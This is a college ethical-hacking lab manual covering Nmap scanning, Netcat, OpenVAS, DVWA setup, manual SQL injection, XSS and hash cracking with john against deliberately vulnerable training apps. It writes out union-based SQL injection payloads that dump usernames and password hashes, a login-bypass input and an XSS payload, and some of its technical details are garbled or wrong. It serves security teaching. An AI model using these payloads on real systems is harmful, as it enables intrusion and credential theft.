Académique Documents
Professionnel Documents
Culture Documents
College, Rajkot
LAB MANUAL
CERTIFICATE
____________________________________________________________
Date:- ______________________________________________________
Staff-in-charge _____________________________________
P a g e 2 | 96
INDEX
4 TCP / UDP 40
connectivity using
Netcat
5 Network vulnerability 46
using OpenVAS
6 Web application 59
testing using DVWA
9 Automated SQL 86
injection with SqlMap
P a g e 3 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot
Experiment 1
AIM: BASIC COMMANDS OF WINDOWS AND KALI LINUX
P a g e 4 | 96
0.1 Basic Commands in Windows
1. ipconfig
Internet protocol configuration in Microsoft Windows is a console
application that displays all current TCP/IP network configuration values and can
modify Dynamic Host Configuration Protocol DHCP and Domain Name System
DNS settings.
2. ping
Ping is used to determine if a connection exists between your computer, and
another computer connected via TCP/IP. It sends small packets of information to
the other computer, which are returned if the connection is found, and lost
otherwise. Ping is a powerful utility to help determine network related problems.
P a g e 5 | 96
3. tracert
The tracert command is very similar to ping, and is used to visually see a
network packet being sent and received and the amount of hops required for that
packet to get to its destination. It shows you exactly how far a packet can go before
it fails. This will help you know if the connection problem is close, or more
towards the destination.
4. dir
Displays a list of files and subdirectories in a directory.
P a g e 6 | 96
5. cd
Changes the current directory
6. copy
Copies one or more files to another location.
7. delete
Deletes one or more files.
P a g e 7 | 96
8. xcopy
9. move
Moves files and renames files and directories.
10. mkdir
Creates a directory.
P a g e 8 | 96
11. rmdir
Removes (deletes) a directory.
12. msinfo32
This command shows the whole summary of our system. It includes details
of Hardware Resources, Components and Software Environment.
P a g e 9 | 96
13. dxdiag
DxDiag ("DirectX Diagnostics") is a diagnostics tool used to test DirectX
functionality and troubleshoot video- or sound-related hardware problems. DirectX
Diagnostic can save text files with the scan results. These files are often posted in
tech forums or attached to support emails in order to give support personnel a
better idea of the PC the requester is using in case the error is due to a hardware
failure or incompatibility.
P a g e 10 | 96
14. wmic os get osarchitecture
Is a batch file to check os architecture and then execute appropriate exe.
P a g e 11 | 96
16. gpresult /r
Group Policy Results (GPResult.exe) command line tool verifies all policy
settings in effect for a specific user or computer.
P a g e 12 | 96
17. systeminfo
Displays detailed configuration information about a computer and its
operating system, including operating system configuration, security information,
product ID, and hardware properties, such as RAM, disk space, and network cards.
18. net statistics
Displays the statistics log for the local Workstation or Server service, or the
running services for which statistics are available. Used without parameters, net
statistics lists the running services for which statistics are available.
P a g e 13 | 96
0.2 Commands in Kali Linux
1. id
Displays the user who executed the program.
2. uname -a
Displays the kernel name, hostname, kernel release, kernel version, machine
name, processor (if known), hardware (if known) and operating system.
3. lsb_release -a
Displays which version of Kali-Linux is currently installed.
4. ifconfig
Displays various bits of information about the NIC (e.g. IP addresses,
subnet, MAC address etc).
P a g e 14 | 96
Note: ifconfig -a, will display information about ALL NICs (including the ones
that are currently.
0.2.2 Networking
1. route -n
Displays the routing table (gateways information).
2. cat /etc/resolv.conf
Displays the DNS information.
P a g e 15 | 96
3. cat /etc/network/interfaces
Displays the network interface configuration.
4. cat /etc/hosts
Static values for hostname lookups.
Note: Editing these values, will NOT change your hostname (for that look into
hostname & /etc/hostname).
0.2.3 Hardware
1. lspci
List all PCI devices (e.g. Internal devices).
P a g e 16 | 96
P a g e 17 | 96
2. lsusb
List all USB devices (e.g. External devices).
3. dmesg
Displays the contents of the kernel buffer (Whats in the kernel log).
P a g e 18 | 96
Note: Warning, this may produce a very large output.
4. lsmod
Displays the status of modules in the Linux Kernel (e.g. what drivers
have been loaded).
P a g e 19 | 96
P a g e 20 | 96
0.2.4 Wi-Fi
1. airmon-zc –verbose
A modified version of airmon-ng, which helps with troubleshooting
and monitor mode.
2. rfkill
Enables (and disables) wireless devices.
3. iwconfig
Displays & controls 802.11 NICs.
P a g e 21 | 96
4. airmon-ng
Automates turning wireless cards into monitor mode.
P a g e 22 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot
Experiment 2
AIM: TCP SCANNING USING NMAP
P a g e 23 | 96
1.1 Why we require nmap ?
Hacking
P a g e 24 | 96
These are people who work both offensively and protectively at
different times. We can't foresee their conduct. Sometimes they
utilize their skills for the benefit of all while in some different
times he utilizes them for their personal gains.
Ethical Hacking
Ethical hacking and ethical hacker are terms used to describe hacking
performed by a company or individual to help identify potential threats
on a computer or network.
P a g e 25 | 96
PC ought to be on same system or some sort of interchange systems
administration structure must be available between them. Implies if your
PC is with no system (implies standalone) then you are safe. Hacking is
unlawful according to Cyber Law of all nation so never attempt to be a
programmer however at any rate know the layouts, to defend yourself.
1. Reconnaissance
2. Scanning & Enumeration
3. Gaining access
4. Maintaining access
5. Clearing tracks (Covering Tracks)
1) Reconnaissance
P a g e 26 | 96
3) Gaining Access
4) Maintaining access
To avoid getting traced and caught, Hacker clears all the tracks by
clearing all kinds of log and deleted the uploaded backdoor and
anything related stuff which may later reflect his presence. Examples of
exercises amid this period of the assault incorporate steganography, the
utilization of burrowing conventions, and modifying log documents.
Ethical hacking tools
Many tools have been developed for ethical hackers to evaluate security
levels. Here we describe some of the widely used tools in ethical hacking.
• Tools:
Samsopade
P a g e 27 | 96
Nmap
Nessus
MetaSploit
NetStumbler
Samspade
• Zone Transfer – ask a DNS server for all it knows about a domain.
• SMTP Relay Check – check whether a mail server allows third party
relaying.
• Scan Addresses – scan a range of IP addresses looking for open ports.
• Crawl website – search a website, looking for email addresses, offsite
links, etc.
• Browse web – browse the web in a raw http format.
• Check cancels – search your news server for cancel messages.
• Fast and Slow Traceroute – find the route packets take between you
and a remote system.
• S-Lang command – issue a scripting command; useful for debugging
scripts.
• Decode URL – decipher an obfuscated URL.
• Parse email headers – read email headers and make a guess about the
origin of the email.
Nmap
Nmap is a best tool ever that are used in the second phase of ethical
hacking means port scanning, Nmap was originally command line tool
that has been developed for only Unix/Linux based operating system but
now its windows version is also available and ease to use. It is use for
Operating system fingerprinting too.
P a g e 28 | 96
Nmap was originally command line tool that has been developed for only
Unix/Linux based operating system but now its windows version is also
available and ease to use.
For a quick and simple scan use.
• $ nmap 192.168.1.1
Now if want to scan a whole network than you have to type this with subnet.
• $ nmap 192.168.1.1/24 or $ nmap 192.168.1.*
Use -O for operating system.
• $ nmap -O 192.168.1.1
Nmap Interesting options
• -f fragments packets
• -D Launches decoy scans for concealment
• -I IDENT Scan – finds owners of processes (on Unix systems)
• -b FTP Bounce
Port Scan Types
• TCP Connect scan
• TCP SYN scan
• TCP FIN scan
• TCP Xmas Tree scan (FIN, URG, and PUSH)
• TCP Null scan
• TCP ACK scan
• UDP scan
Nessus
P a g e 29 | 96
Misconfiguration or unpatched services.
Default passwords and common passwords, in general weak
passwords.
Available vulnerabilities on the system.
MetaSploit
The best tool ever, Metasploit contain a database that has a list of
available exploit and it is easy to use and best tool for doing penetration
testing, Metasploit framework is a sub project and is use to execute exploit
code against a machine and get the desire task done.
NetStumbler
P a g e 30 | 96
1.2 TCP Scanning using Nmap
Commands
nmap -sP 192.168.1.*
-sP: a ping request only
nmap –T4 192.168.1.0/24
-T4: Scanning
P a g e 31 | 96
nmap –sT 192.168.1.*
P a g e 32 | 96
nmap –sU 192.168.1.*
P a g e 33 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot
Experiment 3
AIM: PORT SCANNING USING NMAP
P a g e 34 | 96
2.1 Commands
nmap -sS -P0 -sV -O 192.168.1.0-255
-sS: perform TCP sync scan
-P0: perform a protocol scan; send request on each protocol by its
protocol number
-sV: determine the version number of the protocol running in the target
machine
-O: discover the operating system
P a g e 35 | 96
nmap -sT -p80 192.168.1.*
-sT: TCP connect scan probe
-p80: scan only port 80
P a g e 36 | 96
nmap –O 192.168.1.0
Specifies Operating system
P a g e 37 | 96
nmap –sF 192.168.1.0
-sF: Finding Open Filtered Ports
P a g e 38 | 96
nmap -sS 192.168.1.0/24 -D 192.168.1.44
-D: Decoy; hide the source IP address instead send sync scan request as
host 44 and 55
P a g e 39 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot
Experiment 4
AIM: TCP / UDP CONNECTIVITY USING NETCAT
P a g e 40 | 96
3.1 Basic Information
What is tcp?
• Transmission Control Protocol is core protocol of Internet Protocol Suite.
Commonly it is referred as TCP/IP. TCP provides trusted, ordered, error-
check delivery service etc. TCP provides connection oriented service.
What is udp?
• User Datagram Protocol. An application which do not require trusted
data transmission can use UDP. It provides connectionless service.
What is Netcat?
• Netcat is a networking program designed to read and write data across
both Transmission Control Protocol TCP and User Datagram Protocol
(UDP)
• Port scanning
• File transferring
• Banner grabbing
• Port listening and redirection
• Netcat installation in Linux :
• Most of Linux OS come with installed Netcat
• Type command to check version : nc –h or netcat –h
• If it’s not installed :
• open terminal
• Type : apt-get install netcat
• Type nc –h to conform installation
3.2 Commands
nc –h
• To get help menu in Netcat
P a g e 41 | 96
SSL BANNER GRABBING
P a g e 42 | 96
HTTP BANNER GRABBING
P a g e 43 | 96
CONNECTING SERVER
P a g e 44 | 96
2) Connecting server using IP of server and Port 12348
P a g e 45 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot
Experiment 5
AIM: NETWORK VULNERABILITY USING OPENVAS
P a g e 46 | 96
4.1 Basic Information
What is OpenVAS?
• It is a world’s most advanced Open Source vulnerability scanner and
manager.
• OpenVAS is a combination of several services and tools offering a
comprehensive and powerful vulnerability scanning and vulnerability
management solution.
• Collects and manage security information for network, device and system.
• Uses client-server architecture.
• Server will keep track for all different vulnerability results.
• Scanner in OpenVAS will collect information.
• Inbuilt in Kali Linux.
P a g e 47 | 96
b) Application -> Kali Linux -> Vulnerability Tools ->
OpenVAS -> OpenVAS initial setup
Step 2: Connecting to the OpenVAS Web Interface
a) Open your browser
b) Type https://127.0.0.1:9392
c) Click on I understand the risks
d) Confirm Security Exception
P a g e 48 | 96
P a g e 49 | 96
Step 3: OpenVAS Login Box
Step 4: Login
a) Username and Password may be one of following :
User name : admin & password : admin
User name : chintan & password : chintan
User name : admin & password : chintan
User name : student & password : student
P a g e 50 | 96
Step 5: OpenVAS Security Assistant screen
P a g e 51 | 96
b) Administration->SCAP Database Feed-> Synchronize with
Feed Now
P a g e 52 | 96
Step 7: Add users (If required)
a) Administration->Users
• If you want to add user , delete user or change user access
P a g e 53 | 96
Step 8: Select Targets to Scan
a) Configuration -> Targets
P a g e 54 | 96
c) Click on Create Target Button
P a g e 55 | 96
Step 12: Create a Task
a) Scan Management -> New Task
P a g e 56 | 96
P a g e 57 | 96
c) Click on Create Task Button
P a g e 58 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot
Experiment 6
AIM: WEB APPLICATION TESTING USING DVWA
P a g e 59 | 96
5.1 Basic Information
What is Damn Vulnerable Web App (DVWA)?
• It is a PHP/MYSQL web application which is considered as damn vulnerable.
• The main goal of DVWA is to be an aid for security professionals that is to
test their skills and their tools in legal environment.
• It helps web developers to proper understand the process of securing its web
application and also to teach or even learned by teachers or student for the
security in web application that to in class environment.
Important Note: DVWA should be install in the attacker’s device.
P a g e 60 | 96
Step 2: Unzip download file by the command “unzip filename”.
P a g e 61 | 96
Step 3: Copy dvwa folder into Computer → File system → var → www.
P a g e 62 | 96
Step 4: Set permission of DVWA into 777 for this open Termianl and type
“chmod 777 /var/www/dvwa” and enter.
Step 5: a) Run Apache for this go to Application → kali linux → System Service →
HTTP → apache2start.
b) Apache run successfully.
P a g e 63 | 96
Step 6: a) Run My SQL for this go to Application → kali linux → System Service
→ MySQL → mysql start.
b) My SQL run successfully.
P a g e 64 | 96
Step 7: Create Database for dvwa
a) Open Terminal.
b) Type mysql –u root –p and enter.
c) When it ask for Password simply enter.
d) Now type create database dvwa; and enter.
e) If you want to exit terminal type exit and enter.
P a g e 65 | 96
Step 8: Go to your browser and write http://127.0.0.1/dvwa or http://localhost/dvwa
P a g e 66 | 96
Step 10: If you are getting this error Table 'dvwa.users' doesn't exist ?
Then go to url and type http://127.0.0.1/dvwa/setup.php#
Then click on Create/Reset Database.
P a g e 67 | 96
Step 11: Again go to url and type url http://127.0.0.1/dvwa/login.php
Step12: To Logon with default username and password its default data is username
= admin and password = password.
P a g e 68 | 96
P a g e 69 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot
Experiment 7
AIM: MANUAL SQL INJECTION USING DVWA
P a g e 70 | 96
6.1 Basic Information
What is SQL injection?
• SQL injection is also known as SQL fisting which is a technique usually
used to attack data derived applications.
• To pass a newly formed rogue SQL command to database it requires an
entry field in an attempt to get the website using SQL statements.
• To exploits a security vulnerabilities in an application software, SQL
injection technique.
• SQL injection is mainly used to attack vector for websites but it can attack
any type of SQL database.
Important Note: DVWA should be install in the attacker’s device.
P a g e 71 | 96
Step 3: Click on your browser
Step 4: Type the below url in your browser:
http://172.21.30.133/dvwa/login.php
Note: Here victim’s ipaddress is taken.
P a g e 72 | 96
b) Password: password
c) Click on Login
P a g e 73 | 96
Step 7: Click on SQL Injection in Left hand side menu.
a) Type 1 in the text box.
b) Click on Submit Button.
P a g e 74 | 96
Step 8: Displaying all possibilities that are false and all records that are true.
a) Type %’ or ‘0’=‘0 in the text box.
b) Click on Submit Button.
P a g e 75 | 96
Step 9: To known the version of the database following steps are followed:
a) Type %' or 0=0 union select null, version() # in the text box.
b) Click on Submit Button.
Step 10: To Display the database of the user following steps are followed:
a) Type %' or 0=0 union select null, database() # in the text box.
b) Click on Submit Button.
P a g e 76 | 96
Step 11: To Display whole table in the information_schema, following steps are
followed:
a) Type %' and 1=0 union select null, table_name from
information_schema.tables # in the text box.
b) Click on Submit Button.
Note: information_schema is the information database used to stores information
about all the other database that the MySQL server maintains.
P a g e 77 | 96
Step 12: To Display the detailed table whose prefix start with user table in the
information_schema, following steps are followed:
a) Type %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
b) Click on Submit Button.
P a g e 78 | 96
Step 13: To Display all the columns in the information_schema user table, following
steps are followed:
a) %' and 1=0 union select null, concat(table_name,0x0a,column_name)
from information_schema.columns where table_name = 'users' #
b) Click on Submit Button
Note: Columns will be user_id, first_name, last_name, user and password.
P a g e 79 | 96
Step 14: To Display all the contents in the information_scheme user table, following
command is followed:
a) %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0
a,user,0x0a,password) from users #
b) Click on Submit Button.
P a g e 80 | 96
Step 15: Now, creating a file whose content will be username and hashed password.
a) To save the file, open terminal and create one folder
mkdir /root/Desktop/password
b) Copy all usernames and hashed passwords.
c) It require notepad file to paste the data and for that go to
Applications --> Accessories --> gedit
P a g e 81 | 96
Step 17: To run the password.txt file to get the original passwords of the respective
users, following steps are followed:
a) You should be in your password folder where password.txt file is
saved. (i.e. cd Desktop/password and press enter. )
(As my folder name is Jay and I have save directly in root I have done
cd Jay.)
b) Now type /usr/sbin/john --format=raw-MD5 password.txt
c) Press enter.
P a g e 82 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot
Experiment 8
AIM: XSS
P a g e 83 | 96
7.1 Basic Information
This practical will be perform in Web Application of Virtual Amrita Laboratories
Universalizing Education.
What is Cross Site Scripting (XSS)?
• Cross Site Scripting (XSS) is one type of computer security vulnerability
which is mainly found in web applications.
• It enables to attackers to inject client-side script into Web pages which is
access by other users.
• An attacker can send input like its username, password, and session ID
etc. but later can be captured by external script.
• The victim’s browser does not recognized that the script is not trusted.
Instead they will believe that the script comes from trusted source and
will execute the script. A malicious script can access any cookies, session
tokens, or any other information retrieved through that browser and used
with that site.
Current scenario
• Mr. John is a web developer who creates twitter like web applications. You
came across the website that he build and wanted to show him that his site is
vulnerable to XSS vulnerability.
Details:
• Reflected XSS occurs when user supplied values are not properly sanitized
before output. Here, in the example, go to the link provided and try to some
tweet. You can see that the result is echoed back. Now what if we try to
inject something to the tweet box (say JavaScript)? If the input is not
properly validated we can get the injected script work in the context of the
site. Lets see how it works:
P a g e 84 | 96
I am tweet <Script> alert(“XSS”);</script>
You can see that we get a pop up printing the word “XSS” which
means that the injected JavaScript worked in the context of the site and it is
vulnerable to XSS vulnerability.
7.2 Practical
P a g e 85 | 96
Government Engineering College, Rajkot
Instrumentation and Control Engineering Department
Rajkot
Experiment 9
AIM: SQL INJECTION WITH SQLMAP
P a g e 86 | 96
8.1 Basic Information
What is SqlMap?
• SqlMap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over
of database servers. It comes with a kick-ass detection engine, many
niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from the
database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
Current Scenario
• Mr. Arun has created an awesome online shopping cart application. But he
forgot to do a security audit of the application and left it vulnerable to many
security issues. In this experiment, you will identify the spots or entry points
which are vulnerable to SQL injection attack.
• Find the search box, try entering a ‘(tick) in the search box and observe the
output that you are getting.
Details:
When the students entry a (tick) into the text box, the search query executed
by the application in the backend get modified. The modified query may
not be correct leading the database management system throwing an error
back. The error messages are valuable tips to the attacker and can be used
to construct needed injection input to get the required data which is
unauthorized for the attacker to access.
8.2 Practical
P a g e 87 | 96
Fuzzing
Here you learn how to fuzz web applications, basically to find out if a particular
web application is vulnerable or not. Fuzzing is a technique in which you will be
trying various vulnerable inputs and observing the behavior of the application. In
this experiment you are going to practice a simple fuzzing technique which will
make the underlying database to throw an error
• You can see an online shopping cart application onto left of your screen,
enter a'(tick) mark on to the search box and observe the output.
• The online shopping cart application is using mysql database as its backend
to store data and in order to access this data its underlying code is executing
SQL queries. If the developers are not sanitizing the user input properly, for
example if the application is not checking the values that are being entered
into the search field then the attacker will be able to modify the backend
query. When you enter a '(tick), the backend query get modified. The
injection of '(tick) has made the syntax of backend query incorrect thus
making the mysql to throw an error.
Step 5: You will see a shopping cart wed application
Step 6: Write ( ‘ ) on the textbox and click on search and observe the output.
P a g e 88 | 96
Step 7: Select the given output i.e. shown in Backend SQL Query and paste in
textbox then click Search and Observe the output.
Step 8: This process will continue and give hint to write your
query. Step 9: Choose page 4 and follow the following instruction
P a g e 89 | 96
• If yes, then trying the following inputs and observe, if you are able to login
as administrator.
P a g e 90 | 96
b) Modified Query: select username from login where
username='admin' and 1=1# and password='password'
Step 11: Explanation of above queries
In the above original SQL query, if the username and password entered is
authentic then the query returns true with the username. Otherwise the query
returns false which shows that the username and password doesn't match or
doesn't exist. But the modified query will always return True as the condition
1=1 is always True. Two queries can be combined using an OR operator, if
either of the query returns True then the whole expression returns True. This
will enable us to login as administrator without a valid password.
Step 12: Choose page 5 and follow the instruction given bellow:
P a g e 91 | 96
Step 14: Analyzing the original query
a) We have just written Django and it shows the output but
the original query should be
b) Original Query: select product_name, price from product where
name='django'
Step 15: Now you have to concatenate a SQL query with the existing user
input and let us see how the SQL query gets transformed.
a) Type input as django' union all select 1, 2# in textbox
b) Click on Submit button
c) Observe the output.
P a g e 92 | 96
Step 16: Analyzing Original query.
Now original input should be “ select product_name, price from product
where name='django' union all select 1,2#' ”. So, if you are able to see the
product_name and price of the product django, then it means that the above
query was valid. The union operator in SQL query allow you to concatenate
two SQL queries and execute. But it will only be a valid query if the number
of selections made in the right hand side and left hand side of the union
operator are equal. In the above query there are two selections in the left hand
side i.e. product_name and price, similar in the right hand side we have made
two selections ie 1 and 2. Usually when we are doing injection the right hand
side query will not be visible so we have to do trial and error with dummy
SQL query. Once we find out the number of selections made in the left hand
side, then we can build the injection query accordingly. The next experiment
will demonstrate how to dump mysql metadata database information.
Step 17: Choose page 6 and read the following instructions:
P a g e 93 | 96
Step 18: Dumping data from database
a) Type django' union select 1, table_name from
tables.information_schema# in the textbox
b) Click on Submit
c) Observe the output
P a g e 94 | 96
c) Click on submit.
d) Observe the output.
P a g e 95 | 96
Step 23: Analyzing the modified query
a) Modified Query: select product_name, price from product where
name='django' union all select username, password from login#
P a g e 96 | 96